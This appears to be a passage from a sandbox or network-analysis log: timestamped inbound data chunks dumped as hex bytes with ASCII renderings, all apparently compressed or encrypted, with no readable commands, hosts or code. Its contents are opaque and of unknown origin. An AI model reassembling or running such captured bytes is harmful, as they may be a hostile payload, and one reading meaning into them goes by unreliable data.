2022-11-07 22:49:05 UTC	6824	IN	Data Raw: 51 1c c8 f2 1a 0e 7c b6 75 eb e0 6f 79 eb 74 ac 67 b7 52 b4 4e ef f5 70 cb 67 fd 64 10 0a d9 66 2c 3e 8b e0 0f 4f 6d 4b b7 22 1b 22 dd 6b 87 6c e8 a5 b0 7f 4b 7b 89 09 62 cb ce 5a d0 5b ee f6 72 d0 1f c5 f9 61 0e 56 cd 50 2e a8 06 61 15 f4 ca 9c 01 95 8c 4f 69 2c a9 33 5c f7 b8 09 9a 41 44 54 71 0d 56 78 b9 3c e9 fa 17 16 6d 00 9c c4 ab ce a5 c6 0d d4 9a ac 24 59 5f 58 f1 4d 06 2d 19 96 f7 83 2d 0c 39 e6 d5 6f 24 de 30 17 e2 cd d8 4b 5c 62 a9 72 67 48 a6 72 7e 25 d3 20 0a 9c ee 6c 0a d0 3e ea 05 d4 34 b2 26 a8 c1 f7 5a 07 6b 5c 3b 2f 94 c1 60 ad 31 af 86 60 0b 52 54 3e ee 0e aa e8 fd f1 94 5e 3a f5 88 34 7c 6a 78 c9 17 7c 9d 7d 0b ca e8 7b 07 d1 75 77 33 22 fd ce f1 31 3a 58 c2 2f 8c 7e 1b 26 16 f3 02 55 5b 4a 09 6c 20 d2 c9 e5 74 49 0d 65 0b 17 65 4b e1 Data Ascii: Q\|uoytgRNpgdf,>OmK""klK{bZ[raVP.aOi,3\ADTqVx<m$Y_XM--9o$0K\brgHr~% l>4&Zk\;/`1`RT>^:4\|jx\|}{uw3"1:X/~&U[Jl tIeeK
2022-11-07 22:49:05 UTC	6840	IN	Data Raw: 1f f2 f1 b8 94 5b ac 8f 69 1e 70 9e 0b f9 63 dc 04 fe e2 44 d5 c3 34 bd a4 b1 ab 4b dd bc 4f e0 6d 73 f6 c4 ac f5 fb c0 a7 9d fe c7 7a 4c d0 b3 5d 17 df 68 57 02 c0 01 29 7a d3 eb 67 c1 ad 7b e4 89 e7 00 7c e7 e7 41 70 60 8d 5c ea 44 3a 94 f2 a6 5b 5c c0 4d f5 10 2a 17 db c7 71 2a c9 e6 86 4a f3 7a 20 d1 fc e2 fb 3b fb 65 d6 14 f2 83 27 6a b5 b6 bc 3c 9a c1 09 bc 30 88 77 0d 02 a7 0b fb 03 20 8a b3 14 f4 3b 8e e7 13 66 65 f2 70 2e 78 e8 89 07 f6 18 9e 9f d3 6b 4f b2 af 56 75 54 2a 50 29 24 47 62 e4 ba 9d 6a 48 7a 1e 67 44 f6 38 6c f7 04 24 69 19 e6 53 e8 71 6d d1 42 98 ac 0e f8 6b 23 2e 29 3c b7 60 63 9f 35 28 e4 e6 13 d9 01 12 f3 11 45 86 6c 4b 24 9c 65 5b 30 4f 89 6a 58 df f5 66 19 16 bf 3e 5c 6e b2 29 be 92 d8 e4 1a d7 27 4d 0a cd 3f a6 2a 82 45 28 6e Data Ascii: [ipcD4KOmszL]hW)zg{\|Ap`\D:[\MqJz ;e'j<0w ;fep.xkOVuTP)$GbjHzgD8l$iSqmBk#.)<`c5(ElK$e[0OjXf>\n)'M?E(n
2022-11-07 22:49:05 UTC	6856	IN	Data Raw: 72 20 4b f4 25 f1 0d 61 68 71 a0 62 9f 51 39 ea e8 b0 14 78 88 65 53 c5 99 fe 69 b6 7d 62 6f c5 2f 28 95 97 45 2c d8 23 f1 83 9b e1 67 33 15 53 68 07 4a 12 ac 46 41 5f 57 87 5d f0 80 e8 0b e2 16 7d 23 08 63 0c 87 f5 60 ad 68 87 8d 0d de 1f f1 74 15 75 4e 83 58 6c b7 62 01 54 ee 41 f6 82 1f 3a b3 54 30 09 33 e5 f8 38 04 12 9d 7c 38 63 67 23 c8 a9 ff f7 ba e6 d4 89 b1 72 3d 16 39 4a 9a 33 77 5c 2b db 29 e7 ba 87 86 7a 62 51 c4 6c 98 74 75 4f 27 cc c7 af 43 b2 0a 67 1f b8 eb 73 43 34 7d b9 29 ac fe 61 38 7f ed 3c 6d 85 73 75 67 d5 8f 43 ca 3a 36 0a 79 bd 06 69 9b a2 f7 7d 31 fe 61 83 9e 52 2f 61 48 47 f1 06 9f 60 59 48 3e 07 13 75 e3 66 98 dc 31 0d 2e f2 b0 e9 37 67 c0 3e 0a 7d 28 1a 6d 05 e4 1f 76 e9 23 c1 bd 7d 68 71 c0 e1 63 72 2f 35 3e b0 26 ab 6f 23 8c Data Ascii: r K%ahqbQ9xeSi}bo/(E,#g3ShJFA_W]}#c`htuNXlbTA:T038\|8cg#r=9J3w\+)zbQltuO'CgsC4})a8<msugC:6yi}1aR/aHG`YH>uf1.7g>}(mv#}hqcr/5>&o#
2022-11-07 22:49:05 UTC	6872	IN	Data Raw: 5d 52 97 a3 81 c3 86 59 02 59 65 e9 2b 6b 84 cc 3d a2 30 e2 68 63 17 a7 ff 7d f4 a4 e0 bc 9e b4 2b 77 08 0d f9 61 ec 98 cc 89 5a 52 7b 42 a0 53 c6 b1 4c 69 44 7b eb ac a3 1a 3e 44 b2 1d 2a 29 32 a1 57 b0 3b 6f 8c 47 2a a0 11 63 30 e1 48 98 74 09 62 79 29 d9 6a 87 84 18 66 f4 f3 94 47 93 2e 73 bf 7c 23 b7 8c 48 17 93 5e 00 8c 21 de ac 84 7c 03 7d 70 33 f9 bb 0e 3d 98 a2 71 7a 02 47 76 e7 95 bb 3d 10 bc 3e 8d ac dc 7c 58 dc d6 ac f4 69 b6 44 c0 0f 7a b2 1b 78 2a 7e b3 6c b6 6f ac 31 71 3b 8d 11 34 15 77 76 fb 55 a9 99 a6 af 3c f3 a5 44 77 ac 20 5c 72 39 ce b6 b3 09 13 78 4d 6d 8e 26 3a 55 24 54 91 53 d5 a7 97 65 70 af a7 23 29 54 44 5f 87 a2 9f f7 02 d4 67 20 68 a9 dd 06 fb ae 20 76 32 06 5a a7 67 6e 48 8d 9b c3 7c 63 b3 57 25 e5 66 b5 b7 87 6d a5 a8 12 02 Data Ascii: ]RYYe+k=0hc}+waZR{BSLiD{>D)2W;oGc0Htby)jfG.s\|#H^!\|}p3=qzGv=>\|XiDzx*~lo1q;4wvU<Dw \r9xMm&:U$TSep#)TD_g h v2ZgnH\|cW%fm
2022-11-07 22:49:05 UTC	6888	IN	Data Raw: 28 51 12 38 8b 61 d4 4e 0e 57 9d 18 e3 2e fd f3 5d db e6 4c 2a 27 94 7b bd 69 3e e2 34 67 87 1e f8 8f 8b 52 6b d8 6a b0 70 05 04 40 4f 72 9e 0a 3f 0f 2c f0 ce 16 b4 6f f5 7a d1 be 63 b3 72 6e 47 89 d2 5b de 2e 14 26 ad f1 74 9f 85 73 7e 56 69 62 68 10 aa 67 56 92 46 6d ff 83 28 74 2f 7b 12 48 3a eb 2c 75 64 e9 6c 5a 99 71 03 90 a1 f3 43 49 05 29 d6 59 86 63 17 ee e4 94 5a c7 db 94 c3 ee 4e 34 e1 14 6d 4b 0f 5a 16 e5 54 fe 84 a7 09 a4 7c f5 73 f7 56 2c 1d 5f 62 68 3d 67 7f 65 79 52 81 e4 28 8e bb ed 70 8c 25 0d af eb 54 7f 0b e6 19 30 3e 84 7f e4 b6 90 72 42 23 91 d3 4c de 0a eb 34 12 e6 33 44 e9 02 33 34 eb ef 33 3b 12 43 75 e6 e4 e5 25 15 8b 74 61 25 05 b8 e7 79 66 b9 1b 3c 8a 68 91 bd 4c 75 96 a4 ab cd 1b 72 00 df b2 45 e1 48 0b ec 4b 38 7e b5 59 11 c7 Data Ascii: (Q8aNW.]L*'{i>4gRkjp@Or?,ozcrnG[.&ts~VibhgVFm(t/{H:,udlZqCI)YcZN4mKZT\|sV,_bh=geyR(p%T0>rB#L43D343;Cu%ta%yf<hLurEHK8~Y
2022-11-07 22:49:05 UTC	6904	IN	Data Raw: 1e eb e6 da 30 4e ee 79 aa cc c6 67 9a 78 06 67 fd 4e 80 6a 28 8e 70 d1 cd 80 de e8 30 69 8e 28 62 36 eb eb 70 7e 9b 76 74 13 26 a6 2c 6e 32 6f 75 15 c6 2d e2 8f 26 15 70 31 a3 d2 e8 6b 3f 4f 6c 13 64 b2 8b ea 76 22 2a 4b 34 8a dc 1c 62 7f d6 ab 32 a3 e5 ad 1b 5d f4 43 ae 47 74 b9 f1 26 46 18 68 68 fe bd 62 eb 78 da 11 21 97 1b b4 77 6a a0 93 a2 39 fc 32 40 77 0e 5f ef b5 32 9d 24 8c 73 7d 36 c8 77 ac 84 0d ab 33 e9 d4 a4 7c cb c8 ac db 6c 7f 3f 28 df 75 7b 5a cd 06 00 59 a1 2e 0e be 7e 95 d6 b1 74 07 50 b4 16 58 2a 4c ad 4b d1 7b 91 e3 47 25 f3 93 a4 b8 f4 00 24 29 75 c1 3e cf ac bf 35 ea d0 74 b4 28 2c f0 d9 a0 d5 93 74 c5 b0 73 23 27 fa 31 91 57 d8 b7 e5 44 1b b9 19 56 6a b1 ce 93 75 e1 b4 21 a1 46 6d ea 6a 56 ee 50 e7 05 ca ce 34 d7 98 d9 36 87 67 71 Data Ascii: 0NygxgNj(p0i(b6p~vt&,n2ou-&p1k?Oldv"K4b2]CGt&Fhhbx!wj92@w_2$s}6w3\|l?(u{ZY.~tPXLK{G%$)u>5t(,ts#'1WDVju!FmjVP46gq
2022-11-07 22:49:05 UTC	6920	IN	Data Raw: bf 2e 30 fb d3 9e 41 ca 66 2c 42 ae f3 87 8b 81 8a 2b 17 74 33 79 8d 9e 73 b3 4c 4a 63 ef 11 f8 65 1d 54 68 c5 97 68 28 7f b3 ce 7b f0 30 11 97 ca 38 eb 40 75 41 5c af 58 59 7e 28 7d 61 54 8b 4b 3b 34 82 f7 e3 ff ea 7a 99 e4 ab 74 64 c9 58 68 0b b0 ec 04 8e 05 d6 3f 59 f3 26 9b a3 43 11 6f 29 33 06 39 5e fd 6f f0 4b 37 11 b4 2c 6b ca 1d 6e 49 8e ec b6 6a da 56 6c 59 67 a3 38 b9 c0 69 4b 79 ce 6d 1f 94 d7 0b c3 d0 eb c9 12 56 7b cc 47 47 e9 5b 51 62 bf 3f e8 81 7d 27 50 b8 a4 2f 1f ef 7d 7e ab 2c 6c 9a 13 16 17 76 62 75 c5 7e 02 30 5c a2 56 ed 50 d8 a5 fb a4 13 21 11 56 67 0f 1b f5 51 36 f3 10 cb 30 4d 2c ec 80 73 37 ef 51 d1 c2 95 16 1f e6 b5 12 48 3f 7c 1f 7d f3 26 43 05 dc e1 5b 00 10 6d f6 ca e9 b1 69 00 f7 48 f4 4a bf 66 3b f2 69 33 c1 92 2b 4e bf ff Data Ascii: .0Af,B+t3ysLJceThh({08@uA\XY~(}aTK;4ztdXh?Y&Co)39^oK7,knIjVlYg8iKymV{GG[Qb?}'P/}~,lvbu~0\VP!VgQ60M,s7QH?\|}&C[miHJf;i3+N
2022-11-07 22:49:05 UTC	6936	IN	Data Raw: 63 6c 17 28 b3 27 bc 8f c1 a0 f4 4d df 70 47 ed 79 b5 26 c9 1a 63 5f 5a 4b 4f 1b 75 7a e1 55 6a 2e e2 0e 7c fd 02 6e df cb eb 42 1b 73 6d ec 39 0c 3f 1e be 78 a6 ed e6 d9 13 92 48 88 8d 5e f5 d2 21 7a 62 28 de 63 2b 73 58 6e 5f 9e f0 79 ce 00 3d f3 2b db a9 6e 73 18 62 1a f6 f4 53 eb ff bc c1 1a 60 f2 af 3b 43 db 44 63 21 fe 2a 3b dd e7 ab d9 d0 ec 6c 92 81 3f 7e b9 22 51 51 19 08 9a 62 20 b2 3b f0 3e 00 9a 39 3d cf 21 de 5d 74 7b ea 70 e6 a2 8c 65 6b fa f9 8f 9a 39 a1 21 da 55 d6 39 cb 60 ed 6f f6 fd 86 53 68 29 79 87 74 11 0d 38 2e 21 73 a6 c9 da 90 f6 3b 58 28 ac 27 7c db 02 93 46 23 74 16 21 6b 94 a4 83 81 bb 30 26 7e 39 99 25 89 b7 13 82 70 be 10 e3 9b 0e 1f 24 61 20 0c 5c fd 3c 3e 9e df 6c e0 ae 60 86 ec 96 13 b8 fc 69 10 38 2c 76 aa 38 4d b0 17 3c Data Ascii: cl('MpGy&c_ZKOuzUj.\|nBsm9?xH^!zb(c+sXn_y=+nsbS`;CDc!*;l?~"QQb ;>9=!]t{pek9!U9`oSh)yt8.!s;X('\|F#t!k0&~9%p$a \<>l`i8,v8M<
2022-11-07 22:49:05 UTC	6952	IN	Data Raw: 7f 60 fa 69 f6 60 79 bd ff c0 07 09 2d 65 ef 63 69 ff 75 df 63 f5 4b 79 fe 41 c9 2b 6a 08 58 5b 5e 5e 31 ac 85 2b 1b 54 ae a4 d2 fb 51 62 90 93 3a a3 2c d1 32 d9 2f a7 0a 15 f4 66 2e a7 89 6e 9c 8b 8c db 20 ad 50 c6 74 01 b7 ba b0 2c cc 5d 71 ec f3 2d e8 76 db 24 b3 d9 3b a1 5e 67 2d c9 ea 8a 68 0c f9 74 83 e2 15 e3 b2 17 b9 75 c1 f1 93 68 34 1a fc b1 97 c3 63 a6 37 88 6e f8 4a 0e f4 0a fb 6f c6 21 cf 03 01 e2 c4 01 9c 00 43 7e a8 bb 23 bb 6f 0d 50 10 50 c4 d1 6d a7 93 2e 1d 11 bc 58 c2 95 58 e8 84 82 08 70 38 c5 c9 7e 29 ef c5 2a 52 ff 93 23 14 3f 5c 53 8e 45 81 c0 fb cf 68 3c 72 9b 6c 3c 1c f3 63 97 b8 8e 46 3a b5 6f df f4 95 20 4a 21 72 e2 39 3f b6 2e c5 9b ba 97 69 bf 50 2b 79 8d e2 0c 63 46 ea 92 22 3f bd c2 77 28 65 66 8e 09 64 fa 1d 25 ae 96 c3 36 Data Ascii: `i`y-eciucKyA+jX[^^1+TQb:,2/f.n Pt,]q-v$;^g-htuh4c7nJo!C~#oPPm.XXp8~)*R#?\SEh<rl<cF:o J!r9?.iP+ycF"?w(efd%6
2022-11-07 22:49:05 UTC	6968	IN	Data Raw: db a9 f8 80 fa 1b 66 98 28 98 7b 23 c0 58 bb 78 02 ee 73 e5 de e4 41 1d b9 c6 dd 75 35 33 7d 55 ce 6a a0 55 77 c2 ad 2a 02 28 a1 46 d0 dd 01 53 73 34 5a 60 ee c0 c2 ed 4a 5d 8c 79 e1 1c 3e 60 2e 64 b6 88 1f b3 2c 7c 5e 48 34 25 bd 2b 59 48 7b b8 e0 b0 5c 87 77 9d 38 1a bf cd 87 d0 12 4e 4d 1c f1 79 20 6e 7c 5f 07 c4 64 ef e5 03 2e 08 62 50 30 c1 f5 e8 de d1 92 8b 3a 26 99 48 10 ef ce 6d 35 c3 21 9a d9 1c c5 34 20 c4 22 12 32 f6 13 c5 9a 3f d1 21 3b 49 d5 81 03 5f 30 4f f0 a0 56 53 41 19 3f fe bd 75 5a bf dd 1f e8 8b be 6a d6 38 78 53 67 a0 94 00 34 7a 4b 7f 9f 1d 30 50 7a e3 7c b6 32 12 51 46 76 9e 74 f2 06 73 99 84 f0 2e 70 d0 6d e5 41 de 37 cc 59 96 27 9e b9 f4 58 4c 78 35 7d 5f 87 07 a9 96 d2 2c 31 55 8c bc 11 3f f6 8e 6c 62 95 6c 60 89 12 46 33 56 28 Data Ascii: f({#XxsAu53}UjUw*(FSs4Z`J]y>`.d,\|^H4%+YH{\w8NMy n\|_d.bP0:&Hm5!4 "2?!;I_0OVSA?uZj8xSg4zK0Pz\|2QFvts.pmA7Y'XLx5}_,1U?lbl`F3V(
2022-11-07 22:49:05 UTC	6984	IN	Data Raw: 0d 58 73 f1 6b a3 74 e5 b3 9f 4d 2e e5 6c af 8b 66 a1 13 66 e5 5e fe 86 4c 91 8c 18 eb bd 26 52 0d 7d 9b e9 8a b1 2a fe 2c 30 70 1b e2 b2 cc 2c 32 56 85 8a ef 0d 68 15 07 b4 5d 15 32 c6 4c 47 a0 5e 63 54 5b ca 3d f7 7f 63 dd 6e 86 db cb 07 a4 66 c0 f7 be 26 6c ac b5 0d 10 01 26 18 6d 6f dd 79 23 e8 f3 ee c5 19 e9 e7 ba eb ae 61 b8 c8 b8 15 90 39 74 13 3f 7b 7c 70 62 bf e9 0f 52 8d 4f 22 42 44 7a 57 b8 b6 8d ec db 95 2f 71 57 d7 79 02 93 f1 b8 a2 d4 ec 68 a5 67 d7 62 3f e7 22 b1 de 5c 65 71 f3 7f ea 7c 72 ab c9 f7 44 42 4d ff 61 f1 d1 07 1a bc 66 b6 58 63 3e c0 a8 c2 48 a6 09 75 89 d1 c9 64 a4 0e 54 40 53 8c 2c 7c af f9 55 7e 6d 5e 6c ac 6d 5f b7 92 96 59 6e 60 43 83 37 39 bc 2a ec 7c 30 21 9f 74 15 12 7e 73 6d b9 00 4a 08 87 7b db 57 af 39 ba e7 7f e7 39 Data Ascii: XsktM.lff^L&R},0p,2Vh]2LG^cT[=cnf&l&moy#a9t?{\|pbRO"BDzW/qWyhgb?"\eq\|rDBMafXc>HudT@S,\|U~m^lm_Yn`C79\|0!t~smJ{W99
2022-11-07 22:49:05 UTC	7000	IN	Data Raw: f4 ae a7 d3 20 e2 2d e2 3b 13 f5 62 43 0c 24 45 38 2f 06 67 41 53 20 49 7d f6 ca 61 76 50 66 09 24 01 4f 6b 74 7a 0d 6c 77 5e 14 72 74 83 49 57 83 8b c6 64 30 3e a5 8b 47 01 e6 3b aa 0d 35 14 71 89 2a fc 77 55 4b 49 27 81 e4 d1 8d 28 2e 5d 57 7d e3 9a d3 aa 2a ab 96 7b 74 96 6f 66 73 b4 94 4f c6 ce ee cd d6 24 89 90 68 40 6e b7 1c 32 9e 9d 3c 06 04 8f 8c a5 7c da 79 0e 4d 33 1c 66 79 5b c7 60 a7 37 1b 79 44 3f 38 2e db 09 41 a0 c5 6d d1 a3 3c 65 b3 ec 64 27 a7 92 55 8c 2e cd 57 54 72 4d e7 d5 8b 69 82 53 d5 73 a9 78 b3 95 5e 14 a9 65 15 f3 ea 72 2e 64 30 88 43 52 f6 23 33 08 34 67 f6 15 ee 25 05 66 29 83 00 92 9b 61 0a a8 60 17 9d 4f 73 ad b5 c2 4a 9c c3 38 51 0c 63 6d 26 79 da 48 18 fa 6e 72 01 6b 84 84 51 5e 8d d0 fa 02 d0 ae 0f 53 36 27 8b ad 17 9e 53 Data Ascii: -;bC$E8/gAS I}avPf$Oktzlw^rtIWd0>G;5qwUKI'(.]W}{tofsO$h@n2<\|yM3fy[`7yD?8.Am<ed'U.WTrMiSsx^er.d0CR#34g%f)a`OsJ8Qcm&yHnrkQ^S6'S
2022-11-07 22:49:05 UTC	7016	IN	Data Raw: f2 4b 22 59 be fc 2e 21 79 d0 52 bd 4b ed 7b 3e 08 92 1f 53 23 28 32 76 99 98 06 39 e4 1e 39 36 c6 6a ff 3e 7f 7a 7d 54 12 0c e3 c4 06 79 fb 0c 2c 0a 00 e4 ee 20 00 12 f2 fc 71 59 36 1e f0 14 32 e1 2c b9 1f 10 23 fe 26 7b dc 91 51 45 5b 77 6e b9 df ec 7f ee 9c dc 0b da 2f fa 77 8d f9 c8 89 79 b1 f4 b4 cc 23 e9 a2 1b 31 29 6c e7 49 d1 29 b4 46 a2 a3 7d 6c 01 20 c6 e2 14 d3 30 b5 5d fd 96 e3 f4 fb 6c 7e fb e5 fa 65 6a 60 c6 ae 18 6d 2f 57 6a 1d 12 4a 41 40 36 30 b6 67 bb 70 4b b9 e6 da 29 aa 67 13 f3 25 73 60 cd d0 f7 4e b3 12 6c f0 1a fb 64 62 fb 78 06 56 a2 c9 a0 1b ec 1f 26 70 b8 11 e4 ea 2b f4 3c 4d 75 34 33 ee 3c ad 27 b3 cd f3 28 f5 07 6c 55 ff 38 55 2e b1 09 6f df f7 ff ee e9 bd e4 7f 22 5b aa 30 74 72 0c ff 60 f4 bd ea 78 15 6a e1 b9 53 6f 9c 0e 5b Data Ascii: K"Y.!yRK{>S#(2v996j>z}Ty, qY62,#&{QE[wn/wy#1)lI)F}l 0]l~ej`m/WjJA@60gpK)g%s`NldbxV&p+<Mu43<'(lU8U.o"[0tr`xjSo[
2022-11-07 22:49:05 UTC	7032	IN	Data Raw: 0e 66 f9 37 5c de e5 06 a2 f3 6b ec d9 29 36 ea 9c 0c 02 f5 cc e4 62 2b 3d a7 c9 7c d3 6e f2 25 6f 29 44 c1 f1 21 a4 b4 ff 81 c0 c3 7e 67 37 ab 90 f3 e2 82 b5 23 92 82 4e 61 fe 76 5f 2e 38 07 31 26 42 40 31 e7 66 1d 08 52 f7 36 0a 10 f0 4f c1 e5 79 07 f4 cf e0 89 3d 72 6d 48 2d d9 be e0 75 a0 eb f1 b9 87 e0 9c e9 74 ad 4d 5d 60 f4 48 60 e7 57 76 a5 4f e4 55 3c f6 35 53 2c 47 2e 03 f6 11 44 e1 29 f1 e4 f5 e2 db f6 4c 1f 5a e8 cb b0 e6 3d 17 9d 03 b2 8d e0 17 7a 1b fa b9 c6 e0 29 99 77 ed 2e 00 25 ba ca 78 98 61 f0 26 7e 09 43 44 73 3a 50 6f 65 75 e3 e7 25 1b 01 5e 0f 24 5e 39 e0 37 4f 0b 2e e5 1a 0b fd 49 71 5a 58 fa f0 ed b9 a0 4a e5 f0 e2 e5 e6 c9 be a6 47 92 a3 fd fd 37 a0 e8 7d e5 8e 92 ef 1b c1 e3 24 95 c3 45 7a 60 f8 23 c2 28 4b 90 b0 51 4f fd cf 75 Data Ascii: f7\k)6b+=\|n%o)D!~g7#Nav_.81&B@1fR6Oy=rmH-utM]`H`WvOU<5S,G.D)LZ=z)w.%xa&~CDs:Poeu%^$^97O.IqZXJG7}$Ez`#(KQOu
2022-11-07 22:49:05 UTC	7048	IN	Data Raw: 4b 36 3c 30 32 ff a9 22 df 76 bb 35 d9 99 51 ff 17 05 00 5b 38 06 18 65 03 7a 78 14 13 13 34 7d 63 6f 11 bf 5e ab ce e6 ac 52 2b 85 42 1e 31 74 37 46 2c 1f 1f 54 b0 0e 1d 10 2d 1d d3 29 57 3c cb 81 3e 57 65 e2 da 03 b9 ca ff 71 1e 33 01 35 f9 6a 49 7a 4e 71 fa c0 7b 87 b1 75 e0 3a c6 80 59 e4 b8 2e 20 58 43 3c b7 25 3f d3 49 d6 56 05 5b c0 ad d8 43 fa 01 7a 17 e9 66 d2 7c d6 e0 c6 0b b0 67 b1 7e d6 37 81 c7 c6 7b c7 ac 37 26 f2 60 ef 0e 0e 73 e6 1d 05 a6 15 97 7f 77 23 1f 74 4c 67 fb fd a8 70 5c fb 7d 33 14 06 21 1c 58 1a 44 03 00 48 55 53 e9 4e 44 54 bc 6f 63 20 3e 24 c4 26 7e 89 3b 4f 44 4a 35 20 bd c6 03 03 50 26 e7 07 60 00 67 ff 2e f2 21 8d 71 46 48 2a 43 04 35 49 08 4a 1e 4a eb 2b 38 38 5f 76 59 3d 06 c8 ad ab 78 de ad 58 02 5a 0e 79 bb 81 5b 58 59 Data Ascii: K6<02"v5Q[8ezx4}co^R+B1t7F,T-)W<>Weq35jIzNq{u:Y. XC<%?IV[Czf\|g~7{7&`sw#tLgp\}3!XDHUSNDToc >$&~;ODJ5 P&`g.!qFH*C5IJJ+88_vY=xXZy[XY
2022-11-07 22:49:05 UTC	7064	IN	Data Raw: 21 28 1e e4 f6 0c 7a be 19 52 a3 37 f7 bc 29 5a 38 eb 10 99 4c 67 2b 55 1f 66 86 88 9c ca 31 67 1c 3c 13 15 cf 3c 37 1f 2b 9e 48 23 1b c2 03 78 24 20 83 e5 dd fe db 92 8b 86 86 4c f8 55 99 aa 5f 17 1c c2 8a 6a c0 a6 1f 8c 47 16 cb be 08 f8 04 09 69 04 9c fe 71 e9 50 3a 0e 37 67 41 8e 4a 34 a0 98 d5 7e c9 93 9b 25 ec a7 6c 92 75 ea 59 4e b8 d7 c6 2a 57 f9 bc f9 ce f6 b9 24 0c 28 84 99 96 87 1a f6 05 fd 73 3a 05 d5 8e 87 f4 40 b3 49 8b f6 e0 ad ad 8a 2d 91 bf e3 5f 8c 27 70 17 99 96 87 87 49 a3 cf b8 08 6e 60 21 22 fe c5 b9 06 81 64 0a d3 42 a3 ad d4 1d 07 dd d5 c5 f1 38 d6 5a bd 14 f9 91 93 9b ca 83 f4 64 49 34 31 20 4f 2a a6 71 da f7 ec 07 c9 22 c1 fc 3c 29 5e f1 99 36 83 0f 3d 89 1b 5b d8 89 4d f5 e9 87 56 ed e6 e4 1b 3e 84 96 68 f7 b0 69 33 b9 a2 cd b7 Data Ascii: !(zR7)Z8Lg+Uf1g<<7+H#x$ LU_jGiqP:7gAJ4~%luYNW$(s:@I-_'pIn`!"dB8ZdI41 Oq"<)^6=[MV>hi3
2022-11-07 22:49:05 UTC	7080	IN	Data Raw: f8 f7 87 87 9e 90 cd c5 d8 d1 c0 ca c1 cf d1 db d3 de dd c8 c2 c9 da dd c7 ca cc c2 d5 d7 cf d2 dc d3 c4 c4 de d0 93 9b 85 8c a5 af a4 aa bd b7 bf b2 b8 ad a7 ac a7 a0 ba b7 a9 a7 b0 b2 a3 be b0 bf a1 a1 bb b5 b0 b8 a5 ac 9b 91 99 97 99 93 9b 96 95 80 8a 81 83 84 9e 93 95 9b 8c 8e 87 9a 94 9b 8c 8c 96 98 94 9c 81 88 99 93 98 96 8a 4f 5f c2 71 64 92 78 64 8d 87 c4 b5 b9 92 51 75 62 64 76 98 43 fa 16 0a 6a 8b 7f 7b 6c 67 88 33 1e 37 1e 2b 94 61 59 94 6f 7a 87 68 d0 d6 cc eb 4b 64 63 76 75 2b 91 6e 95 bf 1a 62 d8 98 79 7e 53 68 0a 77 89 e2 89 6b 73 01 67 7f 96 fd 86 0f b5 58 61 70 70 69 67 15 4d f2 04 62 4e b1 66 59 9d 76 05 ae 7b 6d 80 74 53 a9 a4 00 80 15 51 70 65 46 77 46 7e 96 f1 b1 b9 74 6d da de a8 a9 a7 7b 66 97 9e 1c f2 6e 63 64 7d a7 47 00 14 bf 0b Data Ascii: O_qdxdQubdvCj{lg37+aYozhKdcvu+nby~ShwksgXappigMbNfYv{mtSQpeFwF~tm{fncd}G
2022-11-07 22:49:05 UTC	7096	IN	Data Raw: 99 23 36 4d 6d 08 01 f2 ec 03 63 47 b3 f6 c2 21 fd 55 26 96 0e 7b fc c0 d7 a5 5a 2a 06 e2 29 a4 42 96 87 87 9e 92 c4 5b 6c 1a fe bd 33 74 4f 3b a2 ed 75 da 0f c6 d2 11 74 bb 44 2c 87 8d 27 0d 4e 20 9e 67 2a 90 93 9b 85 0f 75 4a f9 c6 dc ec f1 2f 8b 0e 54 89 87 da 72 8d cf 2b 9c 6a 1d 86 51 cf 91 3a 2d 9b aa 1a 24 8c 9b 91 99 0a 0f c6 fd 91 35 a7 3d 0a 07 58 95 36 4e 63 3c 93 1b 61 4d 59 63 3b 5b a2 df 7d ef 9c b9 6a 52 97 86 8c 87 fb 09 6d 26 36 48 f6 67 42 df c9 68 63 02 a7 01 e3 70 36 63 46 bd 78 a6 f3 ef 0c a0 ac 4d b1 10 8a fb ec 94 46 c8 b7 7b b0 d6 ee 52 67 42 a2 53 9d 35 87 9e 90 93 eb ba d5 f4 b2 d1 97 ff b2 a5 fa fd fd 86 d3 f9 c4 2e c9 ac 50 f2 67 a6 77 2e 19 59 0e bc 74 d4 db 98 8c 9b c1 b1 8a b7 03 51 14 6f 88 8b 3c 3b eb d5 42 5a d5 a0 f1 3a Data Ascii: #6MmcG!U&{Z)B[l3tO;utD,'N guJ/Tr+jQ:-$5=X6Nc<aMYc;[}jRm&6HgBhcp6cFxMF{RgBS5.Pgw.YtQo<;BZ:
2022-11-07 22:49:05 UTC	7112	IN	Data Raw: 00 41 67 d1 f7 59 e6 a0 55 f4 4b c9 d2 c5 74 c5 a7 22 5f b3 72 b9 c0 d2 6b 6c 16 ac b9 bb 6c 5e 79 f8 57 2a 51 49 65 f3 89 1a ef d3 b2 47 e8 5c bb 8d a1 47 60 b1 3f 5b 40 92 cd db a7 ac a9 d6 2b 79 64 38 92 70 ed d3 71 f1 9a 4f 79 4a a7 d9 fe 9a 5f 0e a1 e2 b8 6a 89 56 ef e2 49 4c 2b 7a 37 6e fe 47 7a 7e be 66 47 50 5b 11 37 61 74 5f 07 86 f9 14 44 32 3b 32 62 fe e5 a1 98 e4 e9 32 ed 72 7e 8b b1 e1 b8 2d 75 a8 55 ea ab cd 66 38 5d f6 04 24 b4 21 55 ac 69 a3 3f 55 cc 09 1d 05 00 24 c4 7f ae 78 c7 7b c2 46 26 2e 15 77 a9 15 44 79 b6 7a cd 17 5e 0d 2a 3e 78 3e 3b 0c 2e 94 88 af 60 4e 94 a6 b3 12 0c d2 a4 a4 d0 f1 68 5d 5d c2 56 3c 60 42 a5 42 9d fb c9 f5 82 ae 67 c8 57 6d 0d 78 de ad a8 b5 f7 0c 07 cd 77 f3 6f 90 69 4b 51 a7 ad ab 5b 32 94 66 21 51 a7 a1 22 Data Ascii: AgYUKt"_rkll^yWQIeG\G`?[@+yd8pqOyJ_jVIL+z7nGz~fGP[7at_D2;2b2r~-uUf8]$!Ui?U$x{F&.wDyz^>x>;.`Nh]]V<`BBgWmxwoiKQ[2f!Q"
